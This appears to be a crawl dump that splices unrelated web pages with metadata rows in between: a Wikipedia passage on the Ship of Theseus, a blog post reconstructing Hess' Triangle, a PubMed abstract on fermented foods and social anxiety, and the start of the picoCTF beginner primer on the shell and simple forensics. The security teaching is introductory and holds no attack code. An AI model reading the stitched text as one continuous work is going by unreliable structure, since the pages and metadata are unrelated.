According to the *Stanford Encyclopedia of Philosophy*, the deflationist view is that the facts of the thought experiment are undisputed; the only dispute is over the meaning of the term "ship" and is thus merely verbal.[1] American philosopher Hilary Putnam asserts that "the logical primitives themselves, and in particular the notions of object and existence, have a multitude of different uses rather than one absolute 'meaning'."[9] This thesis — that there are many meanings for the existential quantifier that are equally natural and equally adequate for describing all the facts — is often referred to as "the doctrine of quantifier variance."[10]

### Continued identity theory

This solution (proposed by Kate, Ernest et al.) sees an object as staying the same as long as it continuously and metaphysically exists under the same identity without being fully transformed at one time. For instance, a house that has its front wall destroyed and replaced at year 1, the ceiling replaced at year 2, and so on, until every part of the house has been replaced will still be understood as the same house. However, if every wall, the floor, and the roof are destroyed and replaced at the same time, it will be known as a new house.

## Alternative forms

In Europe, several independent tales and stories feature knives of which the blades and handles had been replaced several times but are still used and represent the same knife. France has Jeannot's knife,[11][12] Spain uses Jeannot's knife as a proverb, though it is referred to simply as "the family knife", and Hungary has "Lajos Kossuth's pocket knife". Several variants or alternative statements of the underlying problem are known, including the **grandfather's axe**[13] and **Trigger's broom**,[14][15] where an old axe or broom has had both its head and its handle replaced, leaving no original components.
The Tin Woodman, a character in the fictional Land of Oz, was originally a man of flesh and blood, but all his body parts were replaced one by one by metal parts as a result of a curse placed on his axe. Nevertheless, his identity is retained. Interestingly, he later meets his old body reassembled again into Nick Chopper. The ancient Buddhist text *Da zhidu lun* contains a similar philosophical puzzle: a story of a traveller who encountered two demons in the night. As one demon ripped off all parts of the traveler's body one by one, the other demon replaced them with those of a corpse, and the traveller was confused about who he was.[16] The French critic and essayist Roland Barthes refers at least twice to a ship that is entirely rebuilt, in the preface to his *Essais Critiques* (1971) and later in his *Roland Barthes par Roland Barthes* (1975); in the latter, the persistence of the form of the ship is seen as a key structuralist principle. He calls this ship the *Argo*, on which Theseus was said to have sailed with Jason; he may have confused the *Argo* (referred to in passing in Plutarch's *Theseus* at 19.4) with the ship that sailed from Crete (*Theseus*, 23.1). In Japan, the Ise Grand Shrine is rebuilt every twenty years with entirely "new wood". The continuity over the centuries is considered spiritual and comes from the source of the wood, which is harvested from an adjoining forest that is considered sacred.[17][18] ## See also [edit]## Citations [edit]- ^ **a****b****c****d****e**Wasserman.**f** - ^ **a**Blackburn 2016.**b** - ^ **a**Hobbes 1656.**b** **^**Rea 1997, p. xix.**^**Chomsky 2009, p. 382.**^**Chomsky 2010, p. 9.**^**McGilvray 2013, p. 72.**^**Grand 2003, Introduction.**^**Putnam, H., 1987, "Truth and Convention: On Davidson’s Refutation of Conceptual Relativism", Dialectica, 41: 69–77**^**Hirsch, E., 1982, The Concept of Identity, Oxford: Oxford University Press. 
2002b, "Quantifier Variance and Realism", Philosophical Issues, 12: 51–73.
- ^ "Dumas in his Curricle". *Blackwood's Edinburgh Magazine*. **LV** (CCCXLI): 351. January–June 1844.
- ^ Laughton, John Knox. *Memoirs of the Life and Correspondence of Henry Reeve, C.B., D.C.L. In Two Volumes., Volume 2*. Hamburg, Germany: tredition GmbH. pp. Chapter XXIII. ISBN 978-3-8424-9722-1.
- ^ Browne, Ray Broadus (1982). *Objects of Special Devotion: Fetishism in Popular Culture*. Popular Press. p. 134. ISBN 0-87972-191-X.
- ^ "Heroes and Villains". BBC. Retrieved 16 January 2014.
- ^ Casadevall, Nicole; Flossmann, Oliver; Hunt, David (27 April 2017). "Evolution of biological agents: how established drugs can become less safe". *BMJ*. **357**: j1707. doi:10.1136/bmj.j1707. hdl:20.500.11820/807b405b-e5f0-4ca5-95de-056b1fe3f7d7. ISSN 0959-8138. PMID 28450275. S2CID 1826593.
- ^ Huang & Ganeri 2021.
- ^ 常若(とこわか)=伊勢神宮・式年遷宮にみる和のサステナビリティ [Tokowaka: Japanese-style sustainability as seen in the Ise Grand Shrine's periodic rebuilding] (in Japanese). Daiwa Institute of Research Ltd. 6 April 2016. Archived from the original on 7 May 2021. Retrieved 5 November 2022.
- ^ Shinnyo Kawai (2013). *常若の思想 伊勢神宮と日本人* [The idea of tokowaka: the Ise Grand Shrine and the Japanese] (in Japanese). Shodensha. ISBN 978-4396614669.

## General and cited references

- Blackburn, Simon, ed. (2016). "Ship of Theseus" (Ebook). *The Oxford dictionary of philosophy* (Third ed.). Oxford: Oxford University Press. ISBN 9780191799556. OCLC 945776618.
- Chomsky, Noam (2010). *Chomsky Notebook*. Columbia University Press. p. 9. ISBN 978-0-231-14475-9.
- Chomsky, Noam (29 January 2009). Massimo Piattelli-Palmarini; Juan Uriagereka; Pello Salaburu (eds.). *Of Minds and Language: A Dialogue with Noam Chomsky in the Basque Country*. Oxford University Press. p. 382. ISBN 978-0-19-156260-0.
- Grand, Steve (May 2003). *Creation: Life and How to Make It*. Harvard University Press. ISBN 978-0-674-01113-7. Retrieved 24 September 2022.
- Hobbes, Thomas (1656). "On Identity and Difference". *Elements of philosophy: the first section, concerning body*. London: R & W Leybourn. pp. 100–101.
Retrieved 24 September 2022.
- Huang, Jing; Ganeri, Jonardon (2021). "Is this me? A story about personal identity from the *Mahāprajñāpāramitopadeśa*/*Dà zhìdù lùn*". *British Journal for the History of Philosophy*. **29** (5): 739–762. doi:10.1080/09608788.2021.1881881. S2CID 233821050.
- McGilvray, James (25 November 2013). *Chomsky: Language, Mind and Politics*. Polity. pp. 72–. ISBN 978-0-7456-4990-0.
- Rea, Michael Cannon, ed. (1997). "Introduction". *Material Constitution: A Reader*. Rowman & Littlefield. ISBN 978-0-8476-8384-0. Retrieved 24 September 2022.
- Wasserman, Ryan. "Material Constitution". In Zalta, Edward N. (ed.). *Stanford Encyclopedia of Philosophy*.

## Further reading

- Brown, Christopher (2005). *Aquinas and the Ship of Theseus: Solving Puzzles about Material Objects*. A&C Black. ISBN 978-1-84714-402-7. Retrieved 24 September 2022.
- Deutsch, Harry; Garbacz, Pawel. "Relative Identity". In Zalta, Edward N. (ed.). *Stanford Encyclopedia of Philosophy*.
true
true
true
null
2024-10-12 00:00:00
2003-07-15 00:00:00
null
website
wikipedia.org
Wikimedia Foundation, Inc.
null
null
38,216,528
https://lanre.wtf/blog/2023/01/12/on-actionable-and-actually-useful-logs
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
17,736,223
https://chriswhong.com/open-data/in-search-of-hess-triangle-part-1/
In Search of Hess’ Triangle – Part 1
Chris
# In Search of Hess’ Triangle – Part 1 In late July, this Atlas Obscura article about “New York’s Smallest Piece of Private Property” came hurtling out of the internet and arrived on my doorstep. Urban Planners and local historians delight, on the Isle of Manhattan there’s a tiny triangle of land emblazoned with tiles that spell out this message for all eternity: **“PROPERTY OF THE HESS ESTATE WHICH HAS NEVER BEEN DEDICATED FOR PUBLIC PURPOSES”** Photo by David Gallagher via Flickr Curiosity Piqued. The article goes on to recount the story of how this triangle came to be: In the early 1900s, New York City extended 7th Avenue (and the IRT subway line beneath it) and drew a 100-foot wide path through 11 blocks of Greenwich Village. If your property was between these lines, it was set to be demolished. Our little outspoken triangle was the teeny, tiny corner of a property that once held an apartment building overlooking Sheridan Square, where Christopher and Grove Streets now intersect with 7th Avenue. The owner of this apartment building was named David Hess. He died a few years after the taking, but in 1922, his estate saw fit to leave a little message for the world to know what injustice had occurred in the name of progress. Hess’ Triangle can be found on the sidewalk in front of the entrance to Village Cigars at the corner of Christopher Street and 7th Avenue. Photo by Dion Crannitch via Flickr Naturally, I got to googling, and dug up everything I could about this amazing little triangle. I wanted to know about the building that was there, when it was finally torn down, how hard Hess and his fellow property owners fought to save their buildings, and who made the decision to lay the tile. It turns out there are many other triangles just like it, and you’ll never look at 7th Avenue in the village the same way again. 
My first intuition was to check out the historic maps available from the New York Public Library to verify the existence of this doomed apartment building. First, here’s a current OSM map to get you situated. Hess’ Triangle sits at the southwest corner of the intersection of Christopher Street and 7th Avenue, in front of the entrance to the small triangular building that houses Village Cigars. The first map I found was the Bromley Atlas from 1897, which clearly shows the original plot: The lot is marked “VORHES”, though some articles call it “Voorhees” or “Voorhis”, the name of the apartment building. What’s even more interesting is the Block and Lot numbers, which remain the same today. The **591** you see in the bottom left corner is the Block Number, and the **55** written inside the plot is the lot number. These days, we refer to lots by their BBL, or Borough (1 digit), Block (5 digits), and Lot (4 digits). So the BBL of the Vorhis Apartments would have been 1005910055! Having some fun in QGIS, we can orthorectify this historic map and overlay it on the modern map: If you follow the current building line of 7th Avenue, you can clearly see that it would nip a tiny little corner off of the Vorhis lot! You can also see that the adjoining buildings also got clipped, and the triangle-shaped building that is now Village Cigars was once a mighty quadrangle with faces on Christopher *and* Grove Streets. Another Bromley Atlas from 14 years later (1911) shows the building still standing, but the 100 foot-wide path for the 7th Avenue extension seems to be lightly sketched over the condemned buildings. You can clearly see that a tiny corner of the lot, now spelled “Voorhis”, lies outside of the path of destruction. Finally, in another Bromley Atlas from 1916, the 7th Avenue Extension is complete: But wait, is that a **55** I see at the corner of Christopher Street and 7th Avenue? Lot 55 lives! 
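As an aside, the BBL encoding described earlier is just fixed-width concatenation, so it can be sanity-checked with a zero-padded format string. A quick sketch using the shell's `printf` (the values are Manhattan's borough code 1, block 591, and lot 55 from the atlas):

```shell
# BBL = borough (1 digit) + block (5 digits, zero-padded) + lot (4 digits, zero-padded)
# Manhattan is borough 1; the Voorhis lot was block 591, lot 55.
printf '%01d%05d%04d\n' 1 591 55
# prints 1005910055
```

The zero padding is what makes the scheme sortable and unambiguous: block 591 becomes `00591` and lot 55 becomes `0055`, so every BBL is exactly ten digits.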
We can’t see the line separating it from Lot 54 at this resolution, but it’s there. So exactly how big was Hess’ Triangle? Using Open Data, we can figure it out. Articles state that it was sold in the 1930s to the adjacent building (Lot 54, now Village Cigars). Let’s take a look at New York City’s PLUTO data. Note the BBL I mentioned earlier. There is no more lot 55; it’s been combined with lot 54:

All three of the Bromley Atlases shown above show that the Christopher Street faces of lots 52, 53, and 54 are each 26 feet. Using QGIS, we can measure each one. The measurements match up for lots 52 and 53, but lot 54’s Christopher Street edge is 29.57 feet! So one edge of Hess’ Triangle was 29.57 − 26 = 3.57 feet long. Assuming the edge that ran between Christopher and Grove Streets was parallel to those of its neighbors, we can actually separate the polygon from lot 54 and give Hess’ Triangle its rightful lot number of 55 once again! There it is! According to QGIS, its area is about 7.3 square feet.

For all you geonerds, here’s Hess’ triangle as a shapefile (NY State Plane Long Island feet) and GeoJSON (WGS84).

hess.zip (Shapefile)

hess.geojson (Geojson saved as .txt because WordPress doesn’t allow you to upload geojson)

**Edit 9/3/14:** My friend and fellow map nerd Elliott Plack in Baltimore uploaded the geoJSON to github so you can see it on a map.

**Coming in Part 2**:

- Lots of original news articles referencing David Hess’ Doomed Building, and one written the day after the tiles were laid in 1927.
- Analysis of some of the other tiny triangles left behind by the 7th Avenue Extension

Stay tuned, and thanks for reading!
true
true
true
null
2024-10-12 00:00:00
2014-09-02 00:00:00
null
null
chriswhong.com
chriswhong.com
null
null
1,045,189
http://www.coolinfographics.com/blog/2010/1/8/16-infographic-resumes-a-visual-trend.html
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
9,699,993
http://www.ncbi.nlm.nih.gov/pubmed/25998000
Fermented foods, neuroticism, and social anxiety: An interaction model - PubMed
Username
# Fermented foods, neuroticism, and social anxiety: An interaction model

- PMID: **25998000**
- DOI: 10.1016/j.psychres.2015.04.023

## Abstract

Animal models and clinical trials in humans suggest that probiotics can have an anxiolytic effect. However, no studies have examined the relationship between probiotics and social anxiety. Here we employ a cross-sectional approach to determine whether consumption of fermented foods likely to contain probiotics interacts with neuroticism to predict social anxiety symptoms. A sample of young adults (N=710, 445 female) completed self-report measures of fermented food consumption, neuroticism, and social anxiety. An interaction model, controlling for demographics, general consumption of healthful foods, and exercise frequency, showed that exercise frequency, neuroticism, and fermented food consumption significantly and independently predicted social anxiety. Moreover, fermented food consumption also interacted with neuroticism in predicting social anxiety. Specifically, for those high in neuroticism, higher frequency of fermented food consumption was associated with fewer symptoms of social anxiety. Taken together with previous studies, the results suggest that fermented foods that contain probiotics may have a protective effect against social anxiety symptoms for those at higher genetic risk, as indexed by trait neuroticism. While additional research is necessary to determine the direction of causality, these results suggest that consumption of fermented foods that contain probiotics may serve as a low-risk intervention for reducing social anxiety.

**Keywords:** Exercise; Neuroticism; Probiotic; Social anxiety disorder; Social phobia.

Copyright © 2015 Elsevier Ireland Ltd. All rights reserved.
## Similar articles

- The relationship of social anxiety disorder symptoms with probable attention deficit hyperactivity disorder in Turkish university students; impact of negative affect and personality traits of neuroticism and extraversion. Psychiatry Res. 2017 Aug;254:158-163. doi: 10.1016/j.psychres.2017.04.039. Epub 2017 Apr 22. PMID: 28460287
- Fermented cereal beverages: from probiotic, prebiotic and synbiotic towards Nanoscience designed healthy drinks. Lett Appl Microbiol. 2017 Aug;65(2):114-124. doi: 10.1111/lam.12740. Epub 2017 Jun 7. PMID: 28378421 Review.
- Cognitive risk factors explain the relations between neuroticism and social anxiety for males and females. Cogn Behav Ther. 2017 Apr;46(3):224-238. doi: 10.1080/16506073.2016.1238503. Epub 2016 Oct 3. PMID: 27690746
- Probiotic bacteria in fermented foods: product characteristics and starter organisms. Am J Clin Nutr. 2001 Feb;73(2 Suppl):374S-379S. doi: 10.1093/ajcn/73.2.374s. PMID: 11157344 Review.
- Genetic co-morbidity between neuroticism, anxiety/depression and somatic distress in a population sample of adolescent and young adult twins. Psychol Med. 2012 Jun;42(6):1249-60. doi: 10.1017/S0033291711002431. Epub 2011 Nov 4. PMID: 22051348

## Cited by

- An Anti-Inflammatory Diet and Its Potential Benefit for Individuals with Mental Disorders and Neurodegenerative Diseases-A Narrative Review. Nutrients. 2024 Aug 10;16(16):2646. doi: 10.3390/nu16162646. PMID: 39203783 Free PMC article. Review.
- Predispose, precipitate, perpetuate, and protect: how diet and the gut influence mental health in emerging adulthood. Front Nutr. 2024 Mar 5;11:1339269. doi: 10.3389/fnut.2024.1339269. eCollection 2024. PMID: 38505265 Free PMC article. Review.
- Development of the gut microbiota in the first 14 years of life and its relations to internalizing and externalizing difficulties and social anxiety during puberty. Eur Child Adolesc Psychiatry. 2024 Mar;33(3):847-860. doi: 10.1007/s00787-023-02205-9. Epub 2023 Apr 18. PMID: 37071196 Free PMC article.
- Brain-gut microbiome profile of neuroticism predicts food addiction in obesity: A transdiagnostic approach. Prog Neuropsychopharmacol Biol Psychiatry. 2023 Jul 13;125:110768. doi: 10.1016/j.pnpbp.2023.110768. Epub 2023 Apr 13. PMID: 37061021 Free PMC article.
- The gut microbiome in social anxiety disorder: evidence of altered composition and function. Transl Psychiatry. 2023 Mar 20;13(1):95. doi: 10.1038/s41398-023-02325-5. PMID: 36941248 Free PMC article.
true
true
true
Animal models and clinical trials in humans suggest that probiotics can have an anxiolytic effect. However, no studies have examined the relationship between probiotics and social anxiety. Here we employ a cross-sectional approach to determine whether consumption of fermented foods likely to contain …
2024-10-12 00:00:00
2015-08-15 00:00:00
https://cdn.ncbi.nlm.nih…eta-image-v2.jpg
website
ncbi.nlm.nih.gov
PubMed
null
null
22,766,423
https://wfhtimes.substack.com/p/march-30-2020-universal-mask-policy
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
31,168,859
https://primer.picoctf.org/
The CTF Primer
Samuel Sabogal Pardo; Jeffery John; Luke Jones
## 1. Introduction

You are going to have real fun here. And you will gain the ability to do impressive things in life using a computer. It will be like acquiring a superpower to be able to do things that ordinary people cannot do. Let’s see how that is possible.

A common mobile device, the one you might have in your hands right now, can have 100,000 times more computing power than the computer used to send humans to the moon for the first time. There are 7.7 billion humans; did you know that by 2020 there will be more than 30 billion devices connected to the Internet? Imagine all that power… you could do many unprecedented things with only a little part of it, and that power keeps growing every day…

Our world depends on computers. Imagine the apocalyptic catastrophe if computers ceased to work: money in banks is inaccessible, all telecommunications die, airports cease functioning and commercial airliners would fall from the sky, energy distribution systems become uncontrollable, hospitals and critical life support systems would irrevocably fail, and our society would collapse. In 1988, a single person, without bad intentions, took down the entire Internet with just one malicious program, known as the Morris Worm. Society was different at that time, so it was not as catastrophic as it would be now. But why have we not collapsed yet?

The only way to overcome a weakness is to first know that it exists. Hackers find weaknesses in the computer world. The word hacker has had several definitions throughout history. In a dictionary, we can find two related definitions:

- An expert at programming and solving problems with a computer
- A person who illegally gains access to and sometimes tampers with information in a computer system

We are going to take a little from both definitions, but we will gain access and tamper with information for good.
In other words, a skill can be used for malicious purposes or, to become the real-life hero that manipulates technology at will, keeping the planes in the sky, and society out of collapse. That sounds romantic, but you will realize that just the mere fact of making your computer make something awesome, and getting a secret flag generates emotions and adrenaline. Come with us on this journey to become a real hacker! ## 2. The Shell ##### Luke Jones The Shell is foundational to so many parts of securing computing devices and their networks. Intimidating and alluring (like most symbols enshrined by film makers), understanding the shell can make or break one’s ability to solve challenges in a capture-the-flag competition like picoCTF. To be transparent, I (LT) am still learning a lot about the shell, and I’m just about 10 years into it right now! This is an encouragement - anyone curious enough to jump into rabbit holes here and there is always going to have opportunities to learn more about an amazing tool like the shell. But rest assured, I was proficient in the shell long ago and it does not take very much time before the shell starts working for **you**. Next up, what is that mystique unique to the hacker and their shell? ### 2.1. Symbol of the Hacker A blank, black screen and blinking cursor. Lines and lines of scrolling text and someone in front of that screen who seemingly understands an incomprehensible flow of information. That is the shell. The shell has many other names: the terminal, the command prompt, bash… PowerShell, if you’re looking at Windows and feeling blue. Each name has its own nuances. But that doesn’t matter right now. What matters is that there is the interface to computing devices that nearly all people use, and then there is the shell. If you’ve come here to get a shell and don’t care for much else, then you should skip to the Get a Shell section. Be warned that the shell is more powerful than the usual way of interacting with a device. 
Deleting files is permanent in the shell, any file can be accessed at any moment in the shell, and hopefully it’s not farfetched to assert that those two things are a dangerous combination. ### 2.2. Got Shell? Using a computer or smart device happens in 1 of 2 ways: - Using a pointer such as a mouse, touchpad or finger to select apps, files, or buttons - Using keys on a keyboard to enter simple or complex commands (the Shell) Thankfully, there are TLA’s (Three Letter Acronyms) for both methods described above: - GUI. Pronounced "gooey," stands for Graphical User Interface - CLI. Sounded out: "See-El-Eye," stands for Command Line Interface These acronyms are pretty good as far as acronyms go. We will refer to the shell by many names, perhaps sometimes even by the CLI initialism. The GUI doesn’t have as nice of a name as the shell, so we will probably use GUI to briefly refer to the interface that everyone knows about on computing devices that is driven by a pointer on a screen. Below is a screenshot of a shell after successful login and before the user has typed in any commands: In the picture above, there is a lot of empty space, and even the line of text that exists, does not provide a lot of clarity. The situation is simpler than how it looks. There are only 3 pieces of information in the screenshot above, and you would likely recognize at least one of them if it were **you** who logged on: From left to right in the shell command line prompt: - What does `Q0h313th` mean? - What does `pico-2019-shell1` mean? - What does `~` mean? - What does `$` mean? In terms of raw power, Q0h313th could delete every file they own on this machine with one command. That’s almost never desirable, and I will wait to show this command until there is something useful and desirable to do with it. In terms of useful power, Q0h313th could create a copy of an entire website for use when there is no accessible WiFi. That’s using the command `wget` . 
Now let’s talk about **getting** a shell!

### 2.3. Get a Shell

Cybersecurity is a topic that is most deeply learned by listening **and** doing. For this reason, I advise you to create a picoCTF account at this point if you have not already. Beyond providing 120+ security challenges in helpful learning ramps, every picoCTF account gets access to a web-based Linux *shell*.

A note on the structure of my (LT’s) chapters: many times I will provide a high level tutorial for a task and also a step by step walkthrough for the same task. This is my attempt at accommodating different learning styles and different levels of experience. Typically, the high-level walkthrough is more for learners who already know the basics but need a refresher or need a reminder about the particulars when it comes to this Primer. The step by step walkthrough is more for learners who have never ventured into a particular task before. Of course, you must choose your own path here, but the safest bet may be to read the high-level walkthrough but actually put hands to keyboard for the step by step walkthrough.

#### 2.3.1. High level tutorial

- **Gain access to a practice shell**
  - Register for a picoCTF account
  - Click link in email that is sent to registered email address
  - Log in to the picoCTF webshell

#### 2.3.2. Step by Step Walkthrough

**Register for a picoCTF account at the link below.** You will need to validate the email address you provide by clicking on a link that is sent to it. After successfully registering, a web shell can be accessed at the URL below. **Use the same user name and password that you registered on the picoCTF website to log into the shell at the link below** (or in the "Webshell" panel on the picoCTF website). For the sake of security, you will not see your password as you type it in.

#### 2.3.3. Debrief

Congratulations (esp. if this is your first time staring at a command prompt)!
The next section focuses on demystifying the shell by relating its usage to devices you’ve probably already used for years; and if not, you’ll join the ranks of those whose first language is Shell.

### 2.4. GUI-fu to Shell-fu

Our first language as children, whether Spanish, English or anything else primarily for communication with other humans, likely took little conscious effort on our part. For anyone who has learned a second language, it was quite the opposite: very little - if anything - came naturally. Learning Shell for someone who has only "spoken" GUI is like learning a second language. This is good news and bad news. The good news is that Shell and GUI are languages for something you’ve been using for probably years, but the bad news is there is a whole new vocabulary with only a handful of cognates (words that sound and mean the same in both languages) here and there.

The basic computer operations that everyone is familiar with in GUI’s can easily be done in the shell as well. Here are some of the most common operations for anyone using a computing device:

| Operation | GUI action | Shell action | Shell example | Note |
|---|---|---|---|---|
| Start app | Click or touch icon of app | Type name of app and press enter | | Pressing the Enter key sends the command to the shell to run and return. |
| Open file | Browse to file, click | Use | | |
| Download app | Browse app store, click | Use | | Install ChessX game. The hard part was finding a relevant package name. |

As the table above shows, using a GUI involves browsing and clicking, while using a shell involves knowing a good app to use. Google has made finding the right app for a shell interface much easier than it was years ago. As always for CTF’s, Google is your friend! However, more direct resources can be even more helpful, such as this website below that quickly explains shell commands:

However, things do not always go as planned. The next section deals with those sorts of situations that inevitably arise.
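As a terminal-only sketch of those mappings (the file name below is invented for the demo; on a desktop Linux system "Open file" might instead go through a helper such as `xdg-open`, and "Download app" through your distribution's package manager):

```shell
# "Start app": typing a program's name and pressing Enter runs it
date

# "Open file": cat prints a text file's contents straight to the terminal
echo "remember the milk" > grocery.txt
cat grocery.txt

# "Download app": on Debian-style systems this is typically something like
#   sudo apt install chessx
# (left commented out because it needs admin rights and network access)
```

The shell versions look wordier, but each line is a complete, repeatable instruction, which is exactly what makes them scriptable later on.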
### 2.5. What the Shell!?

The steepest part of the learning curve with the shell is that you must know the apps and commands available to you, either by memorization or by looking them up when you need them. Certainly, it is faster to memorize as many as possible. The other challenge is the amount of typing that sometimes must be done to reference the intended file. Lastly, interfacing with apps also requires memorizing or looking up names of parameters or arguments. To summarize, some of the most challenging aspects of using the shell:

- Memorizing commands (aka apps/programs)
- Typing out long commands
- Memorizing arguments for commands

#### 2.5.1. Challenge 1: Memorizing commands

Having a cheat sheet with shell commands listed is a must for overcoming the challenge of memorizing commands. Printing it out is a bonus if possible! (Saves screen space.) The cheat sheet linked below is very good!

#### 2.5.2. Challenge 2: Typing out long commands

Many wonderfully brilliant students of mine have not known how to speed up their typing in the shell command prompt until thousands of picoCTF points into their learning. I take responsibility for this, and really, most of us go through that phase, but we do not have to! One word: **TAB**

In the shell, pressing the TAB key invokes auto-complete by 1. assuming you’ve spelled the command or file correctly up to the point of pressing tab, and 2. completing the command or file name as much as it can. The functionality of auto-complete in the shell is so different from auto-complete in other apps, such as those in a phone, that shell auto-complete is often referred to as tab-complete. It takes some practice to get used to, but it is worth the time as it probably cuts the number of key presses in half! Unlike auto-complete for a soft keyboard on a phone, tab-complete is never wrong; however, this is mostly because it makes no guesses and only helps with completing commands and file paths and names.
It hardly ever helps complete arguments to commands besides file names. If pressing tab doesn’t do anything, this is either because 1. there is no such command or file name to complete what you’ve already typed into the command prompt, or 2. there are multiple commands or file names that could complete what you’ve already typed into the command prompt. Try typing another letter or two. Hit the tab key again. If nothing more is completed, hit tab one more time. If nothing really happens besides an angry noise or flash, then there is no way to complete what you’ve already typed (maybe there is a typo?), but if the issue is that there are multiple possibilities for tab-complete to choose, then these options will display after your second strike on the tab key. The double press of tab can be done at any time, but if there are hundreds of options then the shell will ask for your approval before printing all those options, because that’s not usually very helpful.

In the next section, I will guide you through some fundamental shell commands to start getting a sense for the world of the shell.

#### 2.5.3. Shell Nav Exercise 1

```
# SOME NOTES:
# * text listed after "$" I mean for you to enter into the shell and then
#   press enter
# * text listed after "#" are comments from me to you but are ignored by
#   the shell
#
# this short tutorial is meant to run through foundational shell commands
# with brief explanations for each

# the following command "parks" your shell in your home directory (which is
# somewhere you can create files!)
$ cd

# the following command shows where your shell is parked
$ pwd

# the following command creates a new directory called "tutorial" where you
# are currently parked
$ mkdir tutorial

# the following command moves your shell and parks it in the "tutorial" folder
# you just created
$ cd tutorial

# pwd stands for "print working directory". "working directory" is the
# technical term for where one's shell is parked
$ pwd

# the following command creates an empty file with the name "note.txt"
$ touch note.txt

# the following command lists the contents of your working directory
$ ls

# personally, I prefer a one column output of the contents of my working
# directory, like
$ ls -l

# the following command shows the text content of "note.txt" (which is empty
# right now)
$ cat note.txt

# the following command puts "hello world! I'm a snail" into "note.txt"
$ echo "hello world! I'm a snail" > note.txt

# cat will print something now that there is content in "note.txt"
$ cat note.txt

# the following command makes a copy of "note.txt" called "new-note.txt"
$ cp note.txt new-note.txt

# what is in "new-note.txt"?
$ cat new-note.txt

# * the following command opens "new-note.txt" in a terminal text editor
# * try changing the file, then press Ctrl-X to exit and save
$ nano new-note.txt

# if you were successful, this command should print the new content
$ cat new-note.txt

# if you were not successful, that is just fine. revisit this exercise after
# some more reading and practice!
```

#### 2.5.4. picoGym Problem

Try out your new shell skills with this challenge from the picoGym:

### 2.6. Conclusion

You may have noticed that we did not cover overcoming challenge 3. If you are curious, look up the `man` command explained in this cheat sheet:

Using Google helps with learning commands to solve problems in the shell, and so does the "Explain Shell" website I linked to earlier in this chapter.

## 3. Forensics

##### Luke Jones

### 3.1. What is Forensics?

In general, computer science professionals refer to "Digital Forensics" as "Forensics", for simplicity’s sake. Digital Forensics is the field in cybersecurity that tries to gather and understand evidence after an incident, which can be a crime, to determine how it happened.
This not only helps law enforcement when establishing whether someone is innocent or guilty, but also helps us understand how to improve security in a system that was successfully attacked. Digital Forensics focuses on gathering evidence present in computer devices that hold information electronically. It is a branch of Forensic Science, which can also investigate any type of crime even when no computer media is involved.

### 3.2. How to search for strings and filenames

We will begin by learning how to search for information in a file system. Go to the picoCTF webshell at:

Once you are connected, open up this problem in a separate tab:

Download the problem file in your webshell by right-clicking the link in the problem description and selecting Copy Address or Copy Link. Then download it by typing in `wget ` and pasting the address after 'wget', space. Your command should look something like this, but is likely to not be exactly the same:

`$ wget https://jupiter.challenges.picoctf.org/static/495d43ee4a2b9f345a4307d053b4d88d/file`

You need to copy and paste your own link for the file. Great! So now you should have the challenge file saved on your webshell as `file`. Now what? As a reflex, you should always use the program `file` on new files that CTF challenges give you. The next command is kind of confusing, because the first word references the program `file` and the second word references the file named `file`, but run this command and see what it tells you:

`$ file file`

If done properly, it should tell you:

`file: ASCII text, with very long lines`

This tells us the file is plain text, but has unusually long lines. Since it is plain text, we can use `cat` to see what it contains.

`$ cat file`

Running this command will show that the file is mostly made up of gibberish. If this were a cryptography challenge, decoding the gibberish might be what needs to happen, but this is a 100 point general skills question, so I doubt that’s what needs to happen here.
What is the challenge author pushing us towards? There’s only one hint and it is a `grep` tutorial. What is grep? Grep is a Linux utility, so we can learn about it by bringing up its man page: `$ man grep` The first line of the man page says: `grep, egrep, fgrep, rgrep - print lines that match patterns` This is perfect! We want to search through gibberish to find the flag. But how do we specify the pattern to search for and the file to search in? For this, I recommend the grep tutorial in the hint, not the man page. (Man pages tend to be highly technical and can be confusing to novices) One of the first examples in the grep tutorial uses the following command: `$ egrep 'mellon' mysampledata.txt` 'mellon' is what is being searched for and it is being searched for in 'mysampledata.txt' What if we searched for 'picoCTF' in 'file'? That command would look like: `$ egrep 'picoCTF' file` This should get the flag for you and print it on your screen. Let’s consider another challenge: Download the zip file into your webshell like you did for the previous challenge. As before, use `file` on it right away to have an idea of what you’re dealing with: `$ file files.zip` You should see the following output: `files.zip: Zip archive data, at least v1.0 to extract, compression method=store` To see more of this challenge, all we have to do is unzip the archive: `$ unzip files.zip` You’ll see a lot of output, but you can ignore that for now. List the contents of your current directory to see the new directory called 'files'. Try exploring that a bit with `cd` and `ls` , remember that you’re looking for a file called 'uber-secret.txt'. It may be hard to find 'uber-secret.txt' without the help of a tool. This problem is called 'First Find' and our last problem was called 'First Grep'. Is there a tool called 'find' in Linux? See if there is a manpage: `man find` There is! The first line reads: `find - search for files in a directory hierarchy` This sounds perfect. 
Exit the manual by pressing 'q'. As mentioned before, manpages are quite technical and can be overwhelming to try and read when you are first starting out. Let’s find some simpler examples by Googling. My Google query was `find file linux command` . I felt the need to specify ``` linux command ``` because `find` is such a generic word. My top Google result was this: I especially liked this result because I know plesk is not a commercialized site. Scroll down to the first example under `Basic Examples` . `find . -name thisfile.txt` This command means: starting in the current directory (which is what `.` , dot means), look in this directory and all subdirectories for the file named 'thisfile.txt'. We can slightly modify this example to fit our needs for the challenge. Make sure you are in the 'files' directory for this command. If you unzipped the archive in your home directory, you can use the following command to get back to the 'files' directory: `$ cd ~/files` Once you’re in the files directory, use this command: `$ find . -name uber-secret.txt` If you were in the 'files' directory when you ran this command, you should get the following output: `./adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt` This is the path to the file that was found. We’re going to get into the same directory as this file by following the directories listed in this file path. We know that '.' is our current directory, so our first cd is to 'adequate_books'. Remember to use the Tab key to autocomplete unambiguous file and directory names. To explain what I mean by 'unambiguous' here’s a relevant example of an ambiguous file name in our current context: `$ cd a` If you press the Tab key after only typing 'a' it won’t autocomplete because there are two directories that start with 'a', 'acceptable_books' and 'adequate_books'. The shell doesn’t know which one you want. 
